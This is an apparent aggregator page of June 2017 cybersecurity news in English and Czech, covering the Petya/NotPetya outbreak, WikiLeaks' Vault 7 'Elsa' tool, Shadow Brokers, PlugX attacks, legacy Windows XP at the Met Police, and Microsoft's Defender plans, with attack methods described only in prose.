Microsoft Adding Artificial-Intelligence Based Advanced Antivirus to Windows 10
28.6.2017 thehackernews Safety
Microsoft is making every effort to make its Windows operating system more secure and advanced than ever before by beefing up its security practices and hardening it against hackers and cyber attacks in its next release.
With the launch of its Windows 10 Creator Update (also known as RedStone 3), which is expected to release sometime between September and October 2017, Microsoft is planning to release lots of security features in an effort to prevent major global malware crisis.
Just a few days ago, we reported about Microsoft's plan to build its EMET or Enhanced Mitigation Experience Toolkit into the kernel of the upcoming Windows 10 to boost the security of your computer against complex threats such as zero-day vulnerabilities.
Also, the tech giant has planned to remove the SMBv1 (Server Message Block version 1) — a 30-year-old file sharing protocol which came to light last month after the devastating WannaCry outbreak — from the upcoming Windows 10 (1709) Redstone 3 Update.
Now, Microsoft is turning to artificial intelligence (AI) to create next generation of antivirus software.

Microsoft has revealed that its Windows Defender Advanced Threat Protection (ATP), a Windows 10 enterprise service that flags early signs of infection, will soon be augmented with AI-driven malware analysis.
"The stack will be powered by our cloud-based security intelligence, which moves us from a world of isolated defenses to a smart, interconnected, and coordinated defense grid that is more intelligent, simple to manage, and ever-evolving," Microsoft explains in a blog post.
In the Fall Creators Update for Windows 10, Microsoft will use a broad range of data from Redmond's cloud services, including Azure, Endpoint, and Office, to create an AI-driven antivirus that can pick up on malware behavior and protect other PCs running the operating system.
So, when a new file is discovered by Microsoft's anti-malware cloud service and determined to be malware, its signature will be created, and the AI system will then look for similar malware on other Windows PCs that have network connectivity.
It means this new AI-driven anti-malware system will eliminate the need for users and sysadmins to configure clients and servers to install local patches of antivirus signatures, stopping attacks as they happen and before they have an impact.

Microsoft told CNET that its upcoming update would rely on machine learning from more than 400 Million PCs running Windows 10 to prevent the next global malware crisis like WannaCry and Petya Ransomware attacks.
According to Rob Lefferts, Windows Enterprise, and Security Director, 96 percent of cyber-attacks involve new and zero-day malware, which takes the company hours to create signatures.
But the new AI system will significantly speed up that process by looking for instances of odd behavior within apps to detect an attack.
"If Word were to start allocating memory in big chunks when it never does, we would be able to detect that," Lefferts said. "We built the machine learning models around common applications like Word."
Besides this new upgrade, Windows Defender Advanced Threat Protection also includes some new features like browser-focused Application Guard and cloud-related Device Guard and Exploit Guard.


'Elsa' Tool Allows CIA to Locate Users via Wi-Fi

28.6.2017 securityweek  BigBrothers
WikiLeaks has published a document detailing “Elsa,” a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to track people’s locations via their laptop’s Wi-Fi.

According to its developers, Elsa provides geolocation data by recording the details of Wi-Fi access points, including signal strength, in range of the targeted Windows device. The user’s location and movements can be obtained after the data is sent to third-party location services.

Once Elsa is planted on the target’s computer, it monitors nearby Wi-Fi connections even if the device is not connected to the Internet. Once an Internet connection is available, the malware can send the collected Wi-Fi data to a database containing the geographical location of wireless access points.

The document made available by WikiLeaks showed that Elsa leveraged geolocation databases set up by Google and Microsoft.

The data is encrypted and logged, and the malware’s operator can manually retrieve this log by connecting to the infected device.

“The ELSA project allows the customization of the implant to match the target environment and operational objectives like sampling interval, maximum size of the logfile and invocation/persistence method,” WikiLeaks said. “Additional back-end software (again using public geo-location databases from Google and Microsoft) converts unprocessed access point information from exfiltrated logfiles to geo-location data to create a tracking profile of the target device.”

CIA Elsa tool

The user manual leaked by WikiLeaks as part of its Vault 7 dump is dated September 2013, which indicates that the tool may have been improved significantly if it’s still maintained by its developer.

7h
WikiLeaks ✔ @wikileaks
RELEASE: CIA 'ESLA' implant to track the location of laptops by intercepting the surrounding WiFi signals https://wikileaks.org/vault7/#Elsa pic.twitter.com/WwMnh9Qxvp
Follow
Kyle Olbert @realKyleOlbert
@wikileaks The #WiFi maps #Vault7 #ELSA appears to rely on have improved dramatically since 2013, theoretically making it far more precise today.
2:14 PM - 28 Jun 2017
1 1 Retweet 5 5 likes
Twitter Ads info and privacy

Earlier this month, WikiLeaks also published documents detailing tools allegedly used by the CIA to spread malware on a targeted organization’s network (Pandemic), hack routers and access points (Cherry Blossom), and hack air-gapped networks using USB drives (Brutal Kangaroo).

WikiLeaks has also detailed tools designed for replacing legitimate files with malware, hacking Samsung smart TVs and routers, MitM tools, a framework used to make malware attribution and analysis more difficult, and a platform for creating custom malware installers.

Security firms have found links between the tools exposed by Wikileaks and the malware used by a cyber espionage group tracked as “Longhorn” and “The Lamberts.”


UK's Metropolitan Police Still Using 10,000 Windows XP Computers

28.6.2017 securityweek  BigBrothers
Legacy Windows XP systems used by public authorities in the UK remains a concern. The WannaCry outbreak last month followed by the current 'NotPetya' outbreak -- both using a vulnerability patched in newer versions of Windows, but initially unpatched in XP -- highlights the problem.

Information obtained by Steve O'Connell, a member of the London Assembly and a Conservative Party spokesperson for policing and crime, shows that the Metropolitan Police Service (MPS, or the Met) was still using 18,293 XP machines on their network at the time of providing the information. Since XP is no longer supported by Microsoft, it is left vulnerable to any new exploits such as EternalBlue and DoublePulsar -- and it appears that only the tendency for WannaCry to crash XP rather than infect it prevented the worldwide outbreak from being far worse than it was.

The Met's position is more precarious than implied by O'Connell's figures. Last month, the UK's data protection regulator, the ICO, published findings (PDF) from a consensual audit of the Met. While finding some areas of 'good practice', it also noted other areas in need of improvement.

In particular, one area for improvement includes the continued use of XP on some desktops and laptops leading to "a residual risk to personal data." But in relation to WannaCry and NotPetya, this risk is magnified by weaknesses in both the Met's backup and business continuity procedures. "Backup arrangements for file systems are not tested to ensure that they are recoverable in the event of a disaster."

Furthermore, "The database used to store BC information is unsupported and not backed up."

The ICO's conclusion was that "The audit has identified considerable scope for improvement in existing arrangements to reduce the risk of non-compliance [with the Data Protection Act]."

The combination of a vulnerable system and untested recovery capabilities is particularly susceptible to ransomware -- and even more so where the ransomware attacks are more intent on mischief than collecting ransoms, as seems to be the case with both WannaCry and NotPetya. The threat to, or potential loss of, personal data stored by the Metropolitan Police is particularly concerning.

"It is vital the Met is given the resources to step up its upgrade timeline before we see another cyber-attack with nationwide security implications," warns O'Connell. But, of course, things are never so simple. SecurityWeek reached out to the Met to confirm O'Connell's figures, and received the following statement:

"The MPS is undergoing a complete refresh of its information technology processes, infrastructure, and equipment - including its desktop computers.

"However, the upgrade programme is not as simple as it would be for many other organizations due to the amount of specialist legacy software upon which parts of the MPS still rely.

"Replacements or remediation for this software that are compatible with a more modern operating system have to be ready before the roll-out is completed to ensure continued operational effectiveness.

"We have completed the upgrade of just over 17,000 devices to Windows 8.1, and this reduces the number of desktops running Previous XP to around 10,000."

The spokesperson did not know, and was unable to find out in time for this article, whether the Met has patched all its Windows systems (not just the XP ones) against MS17-010 vulnerabilities (also known as the EternalBlue vulnerabilities) after the WannaCry outbreak. However, he did add, "The entire Met ICT estate has a number of layers of industry-leading security, which we have been monitoring closely over the past 24 hours. The MPS estate currently remains un-impacted by the cyber-attack and our security checks continue."

The complicating factor of legacy software on legacy systems is a problem, and not just for the Met. "I'm sympathetic to the fact that financially stretched government agencies and public services may not feel that an OS upgrade is the best use of scarce resources," independent security expert David Harley told SecurityWeek.

"Sometimes," he continued, "there are technical reasons for not upgrading a system required to run specific software or peripherals. There may be systems for which an OS upgrade is expected to damage functionality for other reasons, such as underpowered hardware. There are systems that may not require updating because they're fully air-gapped, I suppose. And the risk from running systems that can no longer be updated is sometimes overhyped: there's plenty of malware that doesn't rely on unpatched Windows versions to allow it to execute."

But none of this means that organizations can relax their efforts to upgrade XP systems. "Nonetheless," concluded Harley, "the risk of attack by malware that makes use of vulnerabilities in unpatched machines (such as the new Petya variant that apparently makes use of EternalBlue) is quite significant enough to make it unwise to rely on systems that are no longer normally updated, even if the agencies concerned are taking advantage of rare events like Microsoft's XP patch in May... After all, dangers to their data, systems and internal processes don't only affect their 'business' but all of us."

The bottom line is that 10,000 XP systems still in use by the Metropolitan Police Service is really 10,000 too many.


WikiLeaks Reveals How CIA Malware Tracks Geo-Location of its Targeted

28.6.2017 thehackernews BigBrothers

WikiLeaks has just published a new batch of the ongoing Vault 7 leak, and this time the whistleblowing website has unveiled a classified malware for that tracks geo-location of targeted PCs and laptops running the Microsoft Windows operating system.
In short, the malware does it by capturing the IDs of nearby public hotspots and then matching them with the global database of public Wi-Fi hotspots’ locations.
Dubbed ELSA, the alleged CIA's project consists of two main elements: the processing component (Operator Terminal) and the implant (Windows Target) which is typically being deployed on a target Windows host.
Here's How the CIA's ELSA Malware Works
The Elsa system first installs the malware on a targeted WiFi-enabled machine using separate CIA exploits to gain persistent access on the device.
The malware then uses Wi-Fi hardware of the infected computer to scan nearby visible WiFi access points (AP) and records their ESSID – stands for Extended Service Set Identifier (IEEE 802.11 wireless networking), MAC address and signal strength at regular intervals.
In order to perform this data collection, the ELSA malware does not require the targeted computer to be connected to the Internet. Instead, it only requires the malware to be running on a device with Wi-Fi enabled.
"If [the target device] is connected to the internet, the malware automatically tries to use public geo-location databases from Google or Microsoft to resolve the position of the device and stores the longitude and latitude data along with the timestamp," WikiLeaks notes.
The collected information is then stored in encrypted form on the targeted device for later exfiltration.
The CIA malware itself doesn't beacon (transfer) this data to the agency's server, instead, the operator (CIA hacker) downloads the encrypted log files from the device using separate CIA exploits and backdoors.
The operator then decrypts the log files and performs further analysis on their target.
The ELSA project allows CIA hackers to customize or modify the implant depending upon the target environment and operational objectives such as "sampling interval, the maximum size of the log file and invocation/persistence method."
The CIA hacker (operator) then uses additional back-end software to match collected access point data from exfiltrated log files with public geolocation databases (from Google and Microsoft) and finds the exact location of their target.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks dumped an alleged CIA tool suite for Microsoft Windows, dubbed Brutal Kangaroo, that targets closed networks or air-gapped computers within an organization or enterprise without requiring any direct access.
Since March, the whistleblowing group has published 12 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
Cherry Blossom – a CIA's framework, basically a remotely controllable firmware-based implant, used for monitoring the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Pandemic – a CIA's project that allowed the agency to turn Windows file servers into covert attack machines that can silently infect other computers of interest inside a targeted network.
Athena – A CIA's spyware framework that has been designed to take full control over the infected Windows PCs remotely, and works against every version of Microsoft's Windows operating systems, from Windows XP to Windows 10.
AfterMidnight and Assassin – Two apparent CIA malware frameworks for the Microsoft Windows platform that has been designed to monitor and report back actions on the infected remote host computer and execute malicious actions.
Archimedes – A man-in-the-middle attack tool allegedly developed by the agency to target computers inside a Local Area Network (LAN).
Scribbles – Software supposedly designed to embed 'web beacons' into confidential documents, allowing the CIA to track insiders and whistleblowers.
Grasshopper – A framework that allowed the CIA to easily create custom malware for breaking into Microsoft's Windows and bypassing antivirus protection.
Marble – Disclosed the source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
Dark Matter – Hacking exploits the CIA designed to target iPhones and Macs.
Weeping Angel – Spying tool used by the spy agency to infiltrate smart TV's, transforming them into covert microphones.
Year Zero – CIA hacking exploits for popular hardware and software.


'Shadow Brokers' Threaten to Dox Former NSA Hacker

28.6.2017 securityweek  BigBrothers
The Shadow Brokers has sent out its first round of exploits and data as part of a recently announced monthly subscription service, and the group claims it has a significant number of subscribers.

The hackers, who claim to possess exploits and secret documents stolen from the U.S. National Security Agency (NSA), particularly the Equation Group actor linked to the agency, announced last month that anyone could obtain parts of the data for a monthly fee of 100 Zcash (ZEC), which at the time was worth roughly $20,000.

The group announced on Wednesday its data dump for the month of June and said that they had “many many subscribers.” As a result, individuals and organizations that want next month’s files will have to pay double – 200 ZEC or 1,000 XMR (Monero).

The Shadow Brokers also announced that following requests from several individuals, they have decided to launch a so-called “VIP Service.” Those who want the group’s attention – to learn if they have exploits for specific vulnerabilities or intel on a certain organization – have to make a one-time payment of 400 ZEC, which is currently worth roughly 130,000. The hackers claim someone has already signed up for the VIP service.

A significant part of the statement published on Wednesday by the Shadow Brokers is a message to an individual the hackers call “doctor.” This person, who they claim to have met on Twitter, sent the hackers some “ugly tweets” and later deleted them.

The hackers did some digging and they discovered that the “doctor” is a former member of the Equation Group and they believe he is responsible for building many tools and hacking organizations in China. They also claim that this individual is the co-founder of a new security company.

The Shadow Group told “doctor” that if he doesn’t sign up for their next monthly dump, they will dox him (i.e. expose his real identity).

“TheShadowBrokers is thinking this outcome may be having negative financial impact on new security companies international sales, so hoping ‘doctor’ person and security company is making smart choice and subscribe. But is being ‘doctor’ person's choice. Is not being smart choice to be making ugly tweets with enough personal information to DOX self AND being former equation group AND being co-founder of security company,” the Shadow Brokers said.

While many of the exploits leaked in the past months by the Shadow Brokers had little value, the recent WannaCry ransomware attacks demonstrated that the group’s leaks can lead to significant damage. The hackers’ requests for money were largely ignored until the WannaCry outbreak, but these attacks have made many realize that the group’s exploits can be highly valuable.

Some members of the infosec community decided to launch a crowdfunding initiative to acquire Shadow Brokers exploits via the monthly dump service in an effort to help prevent a future WannaCry-like incident, but they ultimately decided to cancel the project due to legal concerns.


Petya/NotPetya: What We Know in the First 24 Hours

28.6.2017 securityweek Ransomware
Petya/NotPetya Ransomware May Not be a Financially Motivated Attack, Researchers Say

The Petya/NotPetya outbreak that originated in Ukraine on Tuesday but spread globally within hours might have been more than a financially motivated ransomware incident, security researchers suggest.

The attack caught security researchers’ attention because the same EternalBlue SMB exploit employed by WannaCry was used to spread to new machines, and because of the fast pace at which reports of infections started to emerge worldwide.

The malware used in this attack, however, wasn’t WannaCry, but a variant of the Petya ransomware that first emerged in March 2016. Also referred to as Petya.A, Petrwrap, NotPetya, exPetr, and GoldenEye, this Petya variant features a different encryption algorithm implementation than before and is targeting different file types than previously observed variations.

While the exact number of victims isn’t known at the moment, Kaspersky Lab has already confirmed over 2,000 attacks, most of which occurred in Ukraine. During a phone call, Bitdefender’s senior e-threat analyst Bogdan Botezatu confirmed to SecurityWeek that Ukraine was hit the most: “We’ve seen some hits in other countries, but Ukraine was ravaged.”

The Petya/NotPetya attack hit a total of 65 countries, including Belgium, Brazil, Germany, Russia, and the United States, Microsoft reveals. In Ukraine, more than 12,500 machines were affected by the ransomware attack, the tech giant says.

The attack hit Ukraine central bank, government computers, airports, the Kiev metro, the state power distributor Ukrenergo, Chernobyl’s radiation monitoring system, and other machines in the country. It also affected Russian oil giant Rosneft, DLA Piper law firm, U.S. biopharmaceutical giant Merck, British advertiser WPP, and Danish shipping and energy company Maersk, among others.

Jury still out on initial infection vector

What Botezatu couldn’t confirm as of now was the initial infection vector. “We know how the ransomware moves within a network once it has compromised a machine, but we can’t find evidence of the initial infection vector,” he said.

While Microsoft and Cisco suggest that the legitimate updater process of tax accounting software MEDoc was compromised and used as the initial infection vector, the Ukrainian company has already denied the allegations [Ukrainian], and Bitdefender says they confirmed breaches in organizations that don’t use the software.

Kryptos Logic suggests that a zero-day vulnerability might have been used, given that Petya/NotPetya is limited to spreading only to computers in internal networks, and because a spam campaign wouldn’t be as effective.

“We believe to reach such a velocity, this can accomplished by attacking update systems or software packages with 0-day vulnerabilities,” the company says.

Spam email was also considered a possibility, but “likely [wasn’t] responsible for the large number of public sector organizations hit in Ukraine,” a Kryptos Logic security researcher going by the name of MalwareTech says.

According to Costin Raiu, director of Global Research and Analysis Team at Kaspersky Lab, the website of Ukrainian City of Bahmut (Бахмут) might have been used as a secondary initial infection vector after being hacked and repurposed to serve the malware.

Encryption starts within an hour

The Petya/NotPetya variant used in this attack wouldn’t start encrypting infected computers immediately, but would wait for up to 60 minutes before doing so. However, given that the malware reboots the machine before starting the encryption, the delay window is supposedly used for credential gathering and network scanning operations.

“There appears to be a significant delay between running the malware and the beginning of the encryption process. Given that the malware reboots the machine, this is almost certainly to allow a reasonable amount of time to propagate across networks,” Forcepoint points out.

What fully set Petya/NotPetya apart from previous variants was the use of several tools for lateral movement. In addition to a modified EternalBlue exploit, the malware employs the EternalRomance exploit, Mimikatz for credential gathering, and WMIC (Windows Management Instrumentation Commandline) and PSExec for spreading within the compromised network.

The use of several tools allows the ransomware to compromise even up-to-date systems, and reports of companies that patched against EternalBlue but still got infected already emerged. As long as a single computer in the network is compromised, the malware can spread to the remaining ones, it seems.

“Once the ransomware has valid credentials, it scans the local network to establish valid connections on ports tcp/139 and tcp/445. A special behavior is reserved for Domain Controllers or servers: this ransomware attempts calls DhcpEnumSubnets() to enumerate DCP subnets all hosts on all DHCP subnets before scanning for tcp/139 and tcp/445 services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with stolen credentials. It then tries to execute remotely the malware using either PSEXEC or WMIC tools,” Microsoft explains.

As soon as the encryption process starts, the machine is rebooted and the user is informed that the disk is being checked for errors. The same tactic was used by previous Petya variants: the malware would encrypt the Master Boot Record (MBR) while pretending to perform a check disk operation.

Petya/NotPetya uses an AES-128 key to encrypt all targeted files. It then encrypts the AES-128 with the attacker’s public RSA-2048 key and saves it to a README file. Because both keys are securely generated, this solid encryption scheme prevents researchers from creating decryption tools for the malware, “unless a subtle implementation mistake has been made,” Kaspersky says.

Paying not an option to recover files

While this has been said over and over again, it can’t be truer than in Petya/NotPetya’s case: paying is by no means a valid option. The main reason for this is that the attacker no longer has access to the “wowsmith123456@posteo.net” email address listed in the ransom note.

Midway through Tuesday, soon after learning that the email address was being used as part of a malware attack, Posteo decided to block the account straight away. The action is part of the company’s policy of not tolerating the misuse of its platform.

“Since midday it is no longer possible for the blackmailers to access the email account or send emails. Sending emails to the account is no longer possible either,” Posteo notes in a blog post.

While this seems like a logical step to take when encountering email accounts used for nefarious purposes, Posteo’s action certainly did more to hurt victims than help them, as they can no longer contact the attackers to ask for the decryption keys in exchange of payment proof.

The Bitcoin address the attackers ask victims to pay the ransom to already shows 43 transactions and 3.87408155 Bitcoin received, most probably in payments. Petya/NotPetya demands a $300 ransom from its victims.

Not a financially motivated attack

Despite using ransomware, the attack might not have been financially motivated, but rather aimed at data destruction or data theft, security researchers suggest.

“Many companies may be tempted to pay the ransom to get their systems back online. In this outbreak, it appears that the attackers never even attempted to be able to restore files to victims,” IBM’s Diana Kelley notes.

Bogdan Botezatu too notes that this campaign “might not have targeted financial gains but rather data destruction.” He further explains that the use of “a regular, non-bulletproof e-mail service provider,” is the first piece of evidence that the attackers weren’t really interested in getting paid.

Botezatu also told SecurityWeek that there are signs suggesting that the attack was initially targeted at specific companies, but became a global incident after getting out of hand.

He also cites “the lack of automation in the payment & key retrieval process” that “makes it really difficult for the attacking party to honor their end of the promise,” and the fact that the chosen payment confirmation option is rather difficult: “the user has to manually type an extremely long, mixed case “personal installation key” + “wallet” [which] is prone to typos.”

According to Recorded Future, there are reports that the Loki Bot information stealer might have been used in this attack as a secondary payload, suggesting that data theft could have been the purpose of the outbreak.

"Vaccine" available

Unlike the WannaCry outbreak, which was slowed down when a security researcher registered a kill-switch domain, no such option is available in Petya/NotPetya case. However, a vaccine is available, supposedly effective in preventing the ransomware from infecting compromised machines.

Discovered by Cybereason Principal Security Researcher Amit Serper, the vaccine involves the creation of a file named perfc (with no extension name) in the C:\Windows\ folder. Other security researchers also confirmed the finding.


Microsoft uvolnil dávku oprav pro Windows, které se někteří smí vyhnout

28.6.2017 CNEWS.cz Zranitelnosti
Na druhou stranu oprav není nikdy dost a chyb bylo tentokrát eliminováno požehnaně.

Microsoft mimo záplatovací úterý aktualizace vydával buď když si to žádala situace s ohledem na bezpečnost, běžné opravné balíčky pak dodávaly častěji nové verze Windows 10. Včera, tj. 27. června, však všechny podporované verze Desítek získaly své vlastní opravné balíčky. Vydány byly dva týdny po běžném záplatovacím úterý. Jak to? Microsoft nedávno avizoval, že bude tyto opravné balíčky vydávat v předstihu před záplatovacím úterým.

Opravné balíčky vyšly také pro Windows 8.1 a7, kde jsou ale přímo označeny tak, aby bylo jasné, že jde o předběžné verze. Jejich instalace je ryze nepovinná. Pokud si uvedené aktualizace nenainstalujete (ve Windows 10 vám vůbec nebudou nabídnuty), viz tip na straně, obdržíte tyto opravy spolu se záplatami nejdříve 12. července.

Aktualizujte svůj Windows 10
Aktualizujte svůj Windows 10
Ačkoli byly aktualizace uvolněny včera, muselo se jednat o naše pozdní večerní hodiny, neboť pár minut po jednadvacáté hodině mi Windows Update žádné novinky nehlásil. Oproti zmíněnému záplatovacímu úterý ovšem tentokrát nejde o aktualizace, které by přinášely záplaty děr. Následující opravné balíčky pouze zlepšují stabilitu operačního systému, tedy řeší objevené chyby. Situaci nové aktualizace mění následovně:

Tip: Pokud jste službu Windows Update nastavili tak, aby odkládala instalaci nových funkcí, pak vám Windows Update žádnou z těchto nových aktualizací nenabídne. Tato možnost je dostupná jen v edici Pro a vyšších.
aktualizace KB4022716 pro Windows 10 v1703 zvedá číslo sestavení na 15063.447,
aktualizace KB4022723 pro Windows 10 v1607 zvedá číslo sestavení na 14393.1378,
aktualizace KB4032693 pro Windows 10 v1511 zvedá číslo sestavení na 10586.965,
aktualizace KB4032695 pro Windows 10 v1507 zvedá číslo sestavení na 10240.17446.
Seznam oprav pro verzi 1703 je dlouhatánský, mnoho problémů nicméně bylo opraveno také ve verzi 1607. Dvě nejstarší verze Desítek pak dostávají každá po třech opravách.


První ransomware existoval už v roce 1989. Největší neplechu způsobil WannaCry

28.6.2017 Novinky/Bezpečnost Viry
Škodlivý software, který omezuje nebo zabraňuje uživateli přístup k počítači nebo souborům a který v úterý ochromil počítače po celém světě, se obecně označuje jako ransomware (z anglického ransom - výkupné). Za obnovení přístupu totiž požaduje výkupné, zpravidla v digitálních měnách (často bitcoinech), aby se zamezilo možnosti vysledovat platbu.
První známý ransomware byl objeven v roce 1989 pod názvem „AIDS trojan“. Autorem byl Joseph Popp, jehož software prohlašoval, že určitému softwaru v počítači vypršela licence, zašifroval soubory na disku a vyžadoval po uživateli platbu ve výši 189 dolarů firmě PC Cyborg Corporation za odemknutí systému.

Popp byl následně prohlášen za duševně chorého, aby nemusel stanout před soudem. Slíbil příspěvky, které vydělal svým malwarem, na podporu výzkumu AIDS.

Výběr známých kybernetických útoků s použitím ransomwaru z posledních let (řazeno chronologicky):

WinLock – V srpnu 2010 ruské úřady zatkly deset osob napojených na ransomwarového červa známého jako WinLock. Bez použití šifrování zamezil přístupu do systému zobrazením pornografických obrázků a vyzval uživatele k zaslání prémiové textové zprávy za cenu okolo deseti dolarů. Za tuto zprávu uživatel získal kód, který mohl být použit k odemknutí počítače. Podvod zasáhl mnoho uživatelů v Rusku a v sousedních zemích, hackerská skupina údajně takto získala okolo 16 miliónů dolarů.

Reventon – Další ransomware se začal šířit v roce 2012. Zobrazil na obrazovce varování, že uživatel použil počítač pro nějaký druh nelegální činnosti, například pro stahování softwaru bez licence či dětské pornografie. Žádal výkupné za odblokování. Šířil se zejména v západní Evropě a v USA. V únoru 2013 byl v Dubaji zatčen ruský občan, který měl mít napojení na Reventon, později bylo zatčeno dalších deset osob.

CryptoWall nebo CryptoLocker – Poprvé byl zaznamenán v září 2013. Od té doby, nejprve v anglicky mluvících zemích a následně i v dalších státech, bylo nakaženo několik tisíc počítačů. Hackeři za zpřístupnění klíče v anglicky mluvících zemích nejčastěji žádali částku kolem 300 dolarů či eur, v Česku to obvykle bylo kolem 10 000 korun, případně dvojnásobek při nedodržení platby v časovém limitu.

Fusob – Další ransomware s názvem Fusob se šířil od dubna 2015 do března 2016 do mobilních telefonů, požadoval výkupné ve výši od 100 do 200 dolarů. Nejvíce uživatelů (na 40 procent) bylo zasaženo v Německu, méně v Británii a USA.

Škodlivý software pojmenovaný jako WannaCry nebo WanaCrypt0r 2.0 letos v květnu napadl 300 000 počítačů ve 150 zemích světa.
WannaCry – Škodlivý software ransomware pojmenovaný jako WannaCry nebo WanaCrypt0r 2.0 letos v květnu napadl 300 000 počítačů ve 150 zemích světa (asi 600 v ČR). Asi nejmasivnější útok obdobného druhu napadl jednotlivé uživatele, ale také univerzity, nemocnice, dráhy a řadu dalších společností. Za obnovení přístupu požadoval výkupné ve virtuální měně v hodnotě od 300 do 600 dolarů (až 14 000 korun). Útok vedl k nárůstu cen akcií firem zaměřených na kybernetickou bezpečnost. Podle posledních zpráv jsou autoři programu z Číny, původně se spekulovalo o severokorejské stopě.

ExPetr nebo Petya – Nový škodlivý software, který analytici společnosti Kaspersky Lab nazvali ExPetr, zasáhl v úterý řadu podniků a institucí v celém světě včetně ČR. Obzvlášť tvrdě byly zasaženy Ukrajina a Rusko, útoky hlásí rovněž firmy ze západní Evropy a Spojených států. Česká republika je podle antivirové společnosti Eset devátým nejvíce postiženým státem. Hackeři podle Esetu žádají od svých obětí platbu 300 dolarů (zhruba 7000 Kč), jinak napadené a zašifrované zařízení neuvolní.


Video Game Firms Targeted With "Paranoid" PlugX Malware

28.6.2017 securityaffairs Virus

Companies in the video game industry and possibly other sectors have been targeted in attacks involving improved variants of the notorious PlugX remote access trojan (RAT).

Palo Alto Networks has spotted several interesting PlugX samples believed to have been used by the same threat actor. While the company has not provided any details on the actor behind these attacks, PlugX has often been used by China-linked threat groups.

The attacks start with a malicious Word document named “New Salary Structure 2017.doc,” which exploits CVE-2017-0199, an Office vulnerability that has been used by several threat actors, including ones linked to China and Iran.

The exploit downloads a Windows installer file and a PowerShell script that appears to be based on an open source Ruby exploitation library. Both files can load a shellcode designed to unpack the main PlugX DLL in memory. The shellcode is loaded only after the presence of a virtual environment is checked.

The PlugX samples analyzed by Palo Alto Networks contacted several Pastebin URLs containing the addresses of command and control (C&C) servers. The content is encoded via a technique that PlugX has been known to use.

Researchers have described these PlugX samples as “paranoid” due to the fact that the batch script responsible for executing the malware also attempts to clean up after itself by deleting all files created during installation and initial execution, registry keys, and UserAssist key entries.

“Clearly the attacker using this PlugX is paranoid about it being detected on disk, both in the registry and the file system. To top this off the script runs most of the deletion commands more than once,” experts said in a blog post. “The result is that there should be no evidence that the malware was ever executed on the disk, making it harder for forensics teams to identify how the malware got there, and meaning that memory or network based detection would be required to identify the intrusion.”

Researches noticed that, in the first half of this year, the developers of these “paranoid” samples also added mechanisms for bypassing application whitelisting techniques possibly used by their targets. They achieved this by using code made available on GitHub by a user named “SubTee” and, in some cases, they also added some custom code.

While Palo Alto Networks reported that these attacks appear to mainly target the video game industry, the company believes other types of organizations that are outside its telemetry may have been targeted as well.


Petwrap Ransomware massive attack – 24 hours later
28.6.2017 securityaffairs
Ransomware

A new strain of the infamous Petya ransomware dubbed Petwrap, is infecting computers in different states, mostly in Ukraine and Russia.
This is the second massive ransomware-based attack in a few weeks, like WannaCry, the Petwrap ransomware exploits the MS17-010 SMB Remote Code Execution, so-called Eternal Blue, that Microsoft patched in March 2017.

Banks, financial institutions, businesses, energy firms, telecoms and systems in critical infrastructure were infected by the malware, among the victims the giant Maersk that confirmed the attack in an official statement on its Web site:

“We can confirm that Maersk IT systems are down across multiple sites and business units due to a cyber attack.”

Petwrap
Kaspersky telemetry on Petya ransomware

The “Eternal Blue” exploit was developed by the US National Security Agency, its code was leaked and in April by the hacker group Shadow Brokers.

Analyzis conducted by experts revealed that Petwrap also used other tricks to spread inside target networks.

According to the experts at Russian security firm Group-IB, the malware leverages a tool called “LSADump,” which can be used to collect login credentials from Windows computers and domain controllers on the network.

Follow
Group-IB @GroupIB_GIB
New #Petya uses #LSADump to get Admin password and infect all network. There is no need for #EternalBlue vulnerable PCs. #infosec
8:43 PM - 27 Jun 2017
40 40 Retweets 23 23 likes
Twitter Ads info and privacy
While I was writing, there is also news about illustrious victims in the US such as the global law firm DLA Piper that experienced severe issues at its systems.

Which is the attackers’ motivation?

According to security experts the attack presents various anomalies that led the experts into believing that hackers operated for sabotage.

According to Nicholas Weaver, a security researcher at the International Computer Science Institute Petya has been designed to be destructive while masquerading as a ransomware malware.

Weaver highlighted numerous anomalies in the ransomware-based attack, such as the use of a single Bitcoin address for every victim and the fact that the Petwrap operators urge victims to communicate with the them via an email address, while most of ransomware require victims to use Tor for communications.

“I’m willing to say with at least moderate confidence that this was a deliberate, malicious, destructive attack or perhaps a test disguised as ransomware,” states the Weaver’s comment published by Brian Krebs said. “The best way to put it is that Petya’s payment infrastructure is a fecal theater.”

Let me suggest to give a look at Yara rules and IOCs published by Kaspersky in the following analysis:

Schroedinger’s Pet(ya)


Včerejší vlna ransomwaru zasáhla i Česko. Petya je zákeřnější než WannaCry
28.6.2017 Živě.cz
Viry
Především země východní Evropy zasáhla další masivní vlna ransomwaru
Petya šifruje MBR a může napadnout i záplatovaný systém
Útočníci si vydělali asi 9 tisíc dolarů
Výzva zobrazena po zašifrování souborů.Nejpostiženější zemí se stala Ukrajina, kde malware vyřadil například supermarkety. Odnesly to také banky a jejich bankomaty. Útočníci si zatím přišli asi na 9 200 dolarů.Takto se Petya hlásí po restartování systému. Pokud tuto obrazovku spatříte, počítač ihned vypněte.

Výzva zobrazena po zašifrování souborů.
Měsíc po tom, co svět vyděsil malware WannaCry, se včera v podobné míře rozšířila další celosvětová infekce. Opět jde o ransomware využívající díru v protokolu SMB a opět jsou nejvíc postiženy země východní Evropy. Tentokrát to ale odneslo i Česko, které se podle Esetu dostalo mezi desítku nejpostiženějších zemí.

Výzva zobrazena po zašifrování souborů.

Nákaza má označení Win32/Diskcoder.C Trojan a je známá od loňského roku pod názvem Petya. Do jisté míry funguje velmi podobně jako WannaCry – šíří se pomocí nezáplatovaného protokolu pro sdílení v lokální síti, zároveň je ale nezanedbatelné množství počítačů zašifrováno vinou rozkliknutí nebezpečné přílohy v e-mailu. Rovněž může být zneužit systémový program PsExec, jenž standardně slouží pro vzdálenou instalaci aplikací. I proto může být napaden systém, v němž jsou instalovány aktualizace vydané po infekci malwarem WannaCry.

Ukrajina a další země čelí nevídanému kybernetickému útoku. Kdosi útočí na banky, vládu, čerpací stanice i energetiku
Ukrajina a další země čelí nevídanému kybernetickému útoku. Kdosi útočí na banky, vládu, čerpací stanice i energetiku
